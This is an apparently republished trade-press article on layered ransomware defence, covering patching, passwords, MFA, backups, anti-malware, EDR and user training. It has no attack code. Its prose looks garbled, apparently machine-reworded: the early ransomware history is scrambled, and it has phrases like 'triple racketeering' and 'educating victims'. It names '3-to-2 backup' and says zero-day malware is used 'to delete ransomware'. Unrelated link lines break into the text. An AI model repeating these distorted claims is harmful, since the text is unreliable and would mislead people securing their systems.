How to Bridge the Ransomware Security Gap

It’s hard to believe how far ransomware has come since its inception in the early 1980s. Today’s big-game ransomware attacks – threatening everything from critical infrastructure, large corporations, hospitals and schools – can be traced back to a British doctor who shocked AIDS researchers with a bootloader virus (delivered on floppy disks) that could destroy their Computer locked and demanded checkout. Since then, attacks and targets have grown in size and sophistication.

According to recent reports, ransomware attacks increased by 80% in the first half of 2022 compared to the first half of 2021. Today’s attackers break into networks, spend time enumerating and educating victims, and plant ransomware on as many devices as possible, then deploy it to run and encrypt it simultaneously. The effects can be devastating and costly, as evidenced by incidents such as the Colonial Pipeline episode.

Evil actors have also moved away from traditional single blackmail attacks and have progressed to double and triple blackmail attacks. In a double ransom attack, hackers not only encrypt data, but steal it and hold it for ransom. They also steal partner and consumer data or perform a DDoS against services in a triple racketeering attack.

Many midsize organizations struggle to understand the layers of security required to build an impressive defense. Although email is still a common threat vector, the routes of a ransomware attack can vary greatly. To address these challenges, let’s examine the elements required to close the ransomware vulnerability faced by many organizations.

The first is easy – patching. Updating enterprise software, especially on publicly accessible resources such as web applications or web servers, is vital. In most cases, attackers simply exploit legacy vulnerabilities (there are few true zero-day ransomware vulnerabilities). But for IT admins running a hybrid organization with availability requirements, patching can present a serious challenge.

Read  Roblox Penguin Tycoon free codes and how to redeem them (August 2022)

Next, implement strong password practices. There’s an old adage in cybersecurity: “Hackers don’t break in; they log in.” Most often, an attacker will use stolen credentials obtained from a phishing email or found on the dark web. This allows the attacker to gain access to an organization’s root directory and rise through the ranks. Strong passwords are generally long and random (32 characters). Password managers make users’ lives easier by not only creating and storing complex passwords, but also reducing the storage load to just a single master password.

However, relying on passwords alone is weak protection. This is where multi-factor authentication (MFA) comes into play. MFA is a much stronger way to validate users’ trusted identities. A password is just a factor or type of token; Users can also have a biometric as a token, or a certificate as a token image, etc. Anyone attempting to access a corporate network must meet two of these factors. Every single factor can be broken without allowing unauthorized access.

Backup is also crucial for protection against ransomware. When a company can recover encrypted files from a backup, it eliminates the threat of a ransomware attack with one-time extortion. It’s also a best practice for disaster recovery. But there are nuances to approaching backups as part of a ransomware mitigation strategy. Attackers often target backup services and disable them before attacking. Therefore, companies should practice what is known as 3-to-2 backup, where backups are sent to multiple sources or services. It is also advisable to backup a copy of critical data offline.

Advanced malware prevention is also essential for strong ransomware defenses. For the past few decades, malware detection and prevention has been based mostly on signatures—or patterns and specific files. This approach is reactive. When an attacker releases some type of new malware — let’s say it’s ransomware — the signature-based antivirus analyzes it, checks if it’s bad, and looks for a unique pattern, whether it’s a hash for the file or something else. Then a rule is created to match and further identify that file. But today’s malware has become very evasive and multifaceted (WannaCry, for example, can have thousands of versions). In fact, according to recent research, nearly 80% of malware evades signature-based detection. Advanced malware detection uses machine learning algorithms and behavioral detection to stop zero-day malware (which is often used to gain access to a system and then delete ransomware).

Read  The secret behind the secret menu, and why it means big buzz for restaurants

Another useful strategy is to use Endpoint Detection and Response (EDR). New “living off the land” techniques hijack legitimate parts of an operating system (like Windows PowerShell) to give attackers access and launch malware directly into a legitimate process without the need for malware files. To intercept this type of attack, you need to monitor memory, processes running, and look for things like DLL or process injection. EDR solutions examine post-execution activity and anomalies to identify and remediate attacks.

Finally, organizations must not overlook the value of end user education, because even the most robust security strategy is only as strong as its weakest link. Phishing and spear phishing are common vectors for ransomware, so organizations need to ensure every user knows the basics of email security and understands how spear phishing works.

The risks posed by ransomware are just part of the increasingly complex cybersecurity landscape. While no single solution can stop ransomware attacks, a multi-layered defense (including network perimeter, MFA, and endpoint) can ultimately make organizations more secure.

Copyright © 2022 IDG Communications, Inc.

Leave a Comment

Your email address will not be published. Required fields are marked *